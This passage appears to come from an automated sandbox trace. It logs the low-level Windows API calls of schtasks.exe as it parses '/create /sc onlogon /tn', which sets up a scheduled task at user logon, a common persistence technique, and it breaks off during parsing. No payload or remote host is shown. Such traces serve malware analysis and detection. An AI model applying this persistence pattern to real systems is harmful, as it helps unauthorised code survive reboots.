TypeMask=0x0, Condition=0x2) returned 0x18 [0028.263] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0028.263] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0028.263] VerifyVersionInfoW (in: lpVersionInformation=0x16f2c4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x16f2c4) returned 1 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364c40 [0028.263] lstrlenW (lpString="") returned 0 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x2) returned 0x365010 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365020 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364c58 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365040 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365060 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365080 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3650a0 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364c70 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3650c0 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3650e0 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365100 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365120 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364c88 [0028.263] GetProcessHeap () returned 0x350000 [0028.263] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365140 [0028.263] GetProcessHeap () returned 0x350000 [0028.264] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365178 [0028.264] GetProcessHeap () returned 0x350000 [0028.264] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365198 [0028.264] GetProcessHeap () returned 0x350000 [0028.264] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3651b8 [0028.264] SetThreadUILanguage (LangId=0x0) returned 0x409 [0028.264] SetLastError (dwErrCode=0x0) [0028.264] GetProcessHeap () returned 0x350000 [0028.264] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3651d8 [0028.264] GetProcessHeap () returned 0x350000 [0028.264] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3651f8 [0028.264] GetProcessHeap () returned 0x350000 [0028.264] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365218 [0028.265] GetProcessHeap () returned 0x350000 [0028.265] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365238 [0028.265] GetProcessHeap () returned 0x350000 [0028.265] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365258 [0028.265] GetProcessHeap () returned 0x350000 [0028.265] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364ca0 [0028.265] _memicmp (_Buf1=0x364ca0, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.265] GetProcessHeap () returned 0x350000 [0028.265] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x208) returned 0x365ae0 [0028.265] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x365ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0028.265] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x74570000 [0028.266] GetProcAddress (hModule=0x74570000, lpProcName="GetFileVersionInfoSizeW") returned 0x745719d9 [0028.266] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0028.267] GetProcessHeap () returned 0x350000 [0028.267] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x74e) returned 0x365cf0 [0028.267] GetProcAddress (hModule=0x74570000, lpProcName="GetFileVersionInfoW") returned 0x745719f4 [0028.267] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x365cf0 | out: lpData=0x365cf0) returned 1 [0028.267] GetProcAddress (hModule=0x74570000, lpProcName="VerQueryValueW") returned 0x74571b51 [0028.267] VerQueryValueW (in: pBlock=0x365cf0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16f3cc, puLen=0x16f3d0 | out: lplpBuffer=0x16f3cc*=0x36608c, puLen=0x16f3d0) returned 1 [0028.268] _memicmp (_Buf1=0x364ca0, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.268] _vsnwprintf (in: _Buffer=0x365ae0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x16f3b4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0028.268] VerQueryValueW (in: pBlock=0x365cf0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x16f3dc, puLen=0x16f3d8 | out: lplpBuffer=0x16f3dc*=0x365eb8, puLen=0x16f3d8) returned 1 [0028.268] lstrlenW (lpString="schtasks.exe") returned 12 [0028.268] lstrlenW (lpString="schtasks.exe") returned 12 [0028.268] lstrlenW (lpString=".EXE") returned 4 [0028.268] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0028.269] lstrlenW (lpString="schtasks.exe") returned 12 [0028.269] lstrlenW (lpString=".EXE") returned 4 [0028.269] _memicmp (_Buf1=0x364ca0, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.269] lstrlenW (lpString="schtasks") returned 8 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365298 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3652b8 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3652d8 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3652f8 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d00 [0028.269] _memicmp (_Buf1=0x364d00, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0xa0) returned 0x3666d0 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365318 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365338 [0028.269] GetProcessHeap () returned 0x350000 [0028.269] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365358 [0028.269] GetProcessHeap () returned 0x350000 [0028.270] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d18 [0028.270] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.270] GetProcessHeap () returned 0x350000 [0028.270] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x200) returned 0x366778 [0028.270] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0028.270] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0028.270] GetProcessHeap () returned 0x350000 [0028.270] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x30) returned 0x366980 [0028.270] _vsnwprintf (in: _Buffer=0x3666d0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x16f3b8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0028.270] GetProcessHeap () returned 0x350000 [0028.270] GetProcessHeap () returned 0x350000 [0028.270] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365cf0) returned 1 [0028.270] GetProcessHeap () returned 0x350000 [0028.270] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365cf0) returned 0x74e [0028.270] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365cf0 | out: hHeap=0x350000) returned 1 [0028.270] SetLastError (dwErrCode=0x0) [0028.270] GetThreadLocale () returned 0x409 [0028.270] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.270] lstrlenW (lpString="?") returned 1 [0028.270] GetThreadLocale () returned 0x409 [0028.270] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.270] lstrlenW (lpString="create") returned 6 [0028.270] GetThreadLocale () returned 0x409 [0028.270] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.271] lstrlenW (lpString="delete") returned 6 [0028.271] GetThreadLocale () returned 0x409 [0028.271] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.271] lstrlenW (lpString="query") returned 5 [0028.271] GetThreadLocale () returned 0x409 [0028.271] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.271] lstrlenW (lpString="change") returned 6 [0028.271] GetThreadLocale () returned 0x409 [0028.271] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.271] lstrlenW (lpString="run") returned 3 [0028.271] GetThreadLocale () returned 0x409 [0028.271] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.271] lstrlenW (lpString="end") returned 3 [0028.271] GetThreadLocale () returned 0x409 [0028.271] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.271] lstrlenW (lpString="showsid") returned 7 [0028.271] GetThreadLocale () returned 0x409 [0028.271] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0028.271] SetLastError (dwErrCode=0x0) [0028.271] SetLastError (dwErrCode=0x0) [0028.271] lstrlenW (lpString="/create") returned 7 [0028.271] lstrlenW (lpString="-/") returned 2 [0028.271] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.271] lstrlenW (lpString="?") returned 1 [0028.271] lstrlenW (lpString="?") returned 1 [0028.271] GetProcessHeap () returned 0x350000 [0028.271] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d30 [0028.271] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.271] GetProcessHeap () returned 0x350000 [0028.271] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0xa) returned 0x364d48 [0028.271] lstrlenW (lpString="create") returned 6 [0028.271] GetProcessHeap () returned 0x350000 [0028.271] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d60 [0028.271] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.271] GetProcessHeap () returned 0x350000 [0028.271] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365378 [0028.271] _vsnwprintf (in: _Buffer=0x364d48, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|?|") returned 3 [0028.272] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|create|") returned 8 [0028.272] lstrlenW (lpString="|?|") returned 3 [0028.272] lstrlenW (lpString="|create|") returned 8 [0028.272] SetLastError (dwErrCode=0x490) [0028.272] lstrlenW (lpString="create") returned 6 [0028.272] lstrlenW (lpString="create") returned 6 [0028.272] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.272] GetProcessHeap () returned 0x350000 [0028.272] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d48) returned 1 [0028.272] GetProcessHeap () returned 0x350000 [0028.272] RtlReAllocateHeap (Heap=0x350000, Flags=0xc, Ptr=0x364d48, Size=0x14) returned 0x365398 [0028.272] lstrlenW (lpString="create") returned 6 [0028.272] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.272] _vsnwprintf (in: _Buffer=0x365398, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|create|") returned 8 [0028.272] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|create|") returned 8 [0028.272] lstrlenW (lpString="|create|") returned 8 [0028.272] lstrlenW (lpString="|create|") returned 8 [0028.272] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0028.272] SetLastError (dwErrCode=0x0) [0028.272] SetLastError (dwErrCode=0x0) [0028.272] SetLastError (dwErrCode=0x0) [0028.272] lstrlenW (lpString="/sc") returned 3 [0028.272] lstrlenW (lpString="-/") returned 2 [0028.272] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.272] lstrlenW (lpString="?") returned 1 [0028.272] lstrlenW (lpString="?") returned 1 [0028.272] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.272] lstrlenW (lpString="sc") returned 2 [0028.272] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.272] _vsnwprintf (in: _Buffer=0x365398, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|?|") returned 3 [0028.272] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|sc|") returned 4 [0028.272] lstrlenW (lpString="|?|") returned 3 [0028.272] lstrlenW (lpString="|sc|") returned 4 [0028.272] SetLastError (dwErrCode=0x490) [0028.273] lstrlenW (lpString="create") returned 6 [0028.273] lstrlenW (lpString="create") returned 6 [0028.273] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.273] lstrlenW (lpString="sc") returned 2 [0028.273] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.273] _vsnwprintf (in: _Buffer=0x365398, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|create|") returned 8 [0028.273] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|sc|") returned 4 [0028.273] lstrlenW (lpString="|create|") returned 8 [0028.273] lstrlenW (lpString="|sc|") returned 4 [0028.273] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0028.273] SetLastError (dwErrCode=0x490) [0028.273] lstrlenW (lpString="delete") returned 6 [0028.273] lstrlenW (lpString="delete") returned 6 [0028.273] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.273] lstrlenW (lpString="sc") returned 2 [0028.273] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.273] _vsnwprintf (in: _Buffer=0x365398, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|delete|") returned 8 [0028.273] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|sc|") returned 4 [0028.273] lstrlenW (lpString="|delete|") returned 8 [0028.273] lstrlenW (lpString="|sc|") returned 4 [0028.273] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0028.273] SetLastError (dwErrCode=0x490) [0028.273] lstrlenW (lpString="query") returned 5 [0028.273] lstrlenW (lpString="query") returned 5 [0028.273] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.273] lstrlenW (lpString="sc") returned 2 [0028.273] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.276] _vsnwprintf (in: _Buffer=0x365398, _BufferCount=0x8, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|query|") returned 7 [0028.276] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|sc|") returned 4 [0028.276] lstrlenW (lpString="|query|") returned 7 [0028.276] lstrlenW (lpString="|sc|") returned 4 [0028.276] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0028.276] SetLastError (dwErrCode=0x490) [0028.276] lstrlenW (lpString="change") returned 6 [0028.276] lstrlenW (lpString="change") returned 6 [0028.276] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.276] lstrlenW (lpString="sc") returned 2 [0028.276] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.276] _vsnwprintf (in: _Buffer=0x365398, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|change|") returned 8 [0028.276] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|sc|") returned 4 [0028.276] lstrlenW (lpString="|change|") returned 8 [0028.276] lstrlenW (lpString="|sc|") returned 4 [0028.276] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0028.276] SetLastError (dwErrCode=0x490) [0028.276] lstrlenW (lpString="run") returned 3 [0028.276] lstrlenW (lpString="run") returned 3 [0028.276] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.277] lstrlenW (lpString="sc") returned 2 [0028.277] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.277] _vsnwprintf (in: _Buffer=0x365398, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|run|") returned 5 [0028.277] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|sc|") returned 4 [0028.277] lstrlenW (lpString="|run|") returned 5 [0028.277] lstrlenW (lpString="|sc|") returned 4 [0028.277] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0028.277] SetLastError (dwErrCode=0x490) [0028.277] lstrlenW (lpString="end") returned 3 [0028.277] lstrlenW (lpString="end") returned 3 [0028.277] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.277] lstrlenW (lpString="sc") returned 2 [0028.277] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.277] _vsnwprintf (in: _Buffer=0x365398, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|end|") returned 5 [0028.277] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|sc|") returned 4 [0028.277] lstrlenW (lpString="|end|") returned 5 [0028.277] lstrlenW (lpString="|sc|") returned 4 [0028.277] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0028.277] SetLastError (dwErrCode=0x490) [0028.277] lstrlenW (lpString="showsid") returned 7 [0028.277] lstrlenW (lpString="showsid") returned 7 [0028.277] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.277] GetProcessHeap () returned 0x350000 [0028.277] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365398) returned 1 [0028.277] GetProcessHeap () returned 0x350000 [0028.277] RtlReAllocateHeap (Heap=0x350000, Flags=0xc, Ptr=0x365398, Size=0x16) returned 0x3653b8 [0028.277] lstrlenW (lpString="sc") returned 2 [0028.277] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.277] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0xa, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|showsid|") returned 9 [0028.277] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|sc|") returned 4 [0028.277] lstrlenW (lpString="|showsid|") returned 9 [0028.277] lstrlenW (lpString="|sc|") returned 4 [0028.277] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0028.277] SetLastError (dwErrCode=0x490) [0028.277] SetLastError (dwErrCode=0x490) [0028.278] SetLastError (dwErrCode=0x0) [0028.278] lstrlenW (lpString="/sc") returned 3 [0028.278] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0028.278] SetLastError (dwErrCode=0x490) [0028.278] SetLastError (dwErrCode=0x0) [0028.278] lstrlenW (lpString="/sc") returned 3 [0028.278] GetProcessHeap () returned 0x350000 [0028.278] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x8) returned 0x3669b8 [0028.278] GetProcessHeap () returned 0x350000 [0028.278] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365398 [0028.278] SetLastError (dwErrCode=0x0) [0028.278] SetLastError (dwErrCode=0x0) [0028.278] lstrlenW (lpString="onlogon") returned 7 [0028.278] lstrlenW (lpString="-/") returned 2 [0028.278] StrChrIW (lpStart="-/", wMatch=0x6f) returned 0x0 [0028.278] SetLastError (dwErrCode=0x490) [0028.278] SetLastError (dwErrCode=0x490) [0028.278] SetLastError (dwErrCode=0x0) [0028.278] lstrlenW (lpString="onlogon") returned 7 [0028.278] StrChrIW (lpStart="onlogon", wMatch=0x3a) returned 0x0 [0028.278] SetLastError (dwErrCode=0x490) [0028.278] SetLastError (dwErrCode=0x0) [0028.278] lstrlenW (lpString="onlogon") returned 7 [0028.278] GetProcessHeap () returned 0x350000 [0028.278] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d48 [0028.278] GetProcessHeap () returned 0x350000 [0028.278] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3653d8 [0028.278] SetLastError (dwErrCode=0x0) [0028.278] SetLastError (dwErrCode=0x0) [0028.278] lstrlenW (lpString="/tn") returned 3 [0028.278] lstrlenW (lpString="-/") returned 2 [0028.278] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.278] lstrlenW (lpString="?") returned 1 [0028.278] lstrlenW (lpString="?") returned 1 [0028.278] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.278] lstrlenW (lpString="tn") returned 2 [0028.278] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.278] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|?|") returned 3 [0028.278] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tn|") returned 4 [0028.279] lstrlenW (lpString="|?|") returned 3 [0028.279] lstrlenW (lpString="|tn|") returned 4 [0028.279] SetLastError (dwErrCode=0x490) [0028.279] lstrlenW (lpString="create") returned 6 [0028.279] lstrlenW (lpString="create") returned 6 [0028.279] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.279] lstrlenW (lpString="tn") returned 2 [0028.279] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.279] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|create|") returned 8 [0028.279] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tn|") returned 4 [0028.279] lstrlenW (lpString="|create|") returned 8 [0028.279] lstrlenW (lpString="|tn|") returned 4 [0028.279] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0028.279] SetLastError (dwErrCode=0x490) [0028.279] lstrlenW (lpString="delete") returned 6 [0028.279] lstrlenW (lpString="delete") returned 6 [0028.279] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.279] lstrlenW (lpString="tn") returned 2 [0028.279] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.279] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|delete|") returned 8 [0028.279] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tn|") returned 4 [0028.279] lstrlenW (lpString="|delete|") returned 8 [0028.279] lstrlenW (lpString="|tn|") returned 4 [0028.279] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0028.279] SetLastError (dwErrCode=0x490) [0028.279] lstrlenW (lpString="query") returned 5 [0028.279] lstrlenW (lpString="query") returned 5 [0028.279] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.279] lstrlenW (lpString="tn") returned 2 [0028.279] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.279] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x8, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|query|") returned 7 [0028.279] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tn|") returned 4 [0028.279] lstrlenW (lpString="|query|") returned 7 [0028.279] lstrlenW (lpString="|tn|") returned 4 [0028.280] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0028.280] SetLastError (dwErrCode=0x490) [0028.280] lstrlenW (lpString="change") returned 6 [0028.280] lstrlenW (lpString="change") returned 6 [0028.280] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.280] lstrlenW (lpString="tn") returned 2 [0028.280] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.280] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|change|") returned 8 [0028.280] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tn|") returned 4 [0028.280] lstrlenW (lpString="|change|") returned 8 [0028.280] lstrlenW (lpString="|tn|") returned 4 [0028.280] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0028.280] SetLastError (dwErrCode=0x490) [0028.280] lstrlenW (lpString="run") returned 3 [0028.280] lstrlenW (lpString="run") returned 3 [0028.280] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.280] lstrlenW (lpString="tn") returned 2 [0028.280] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.280] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|run|") returned 5 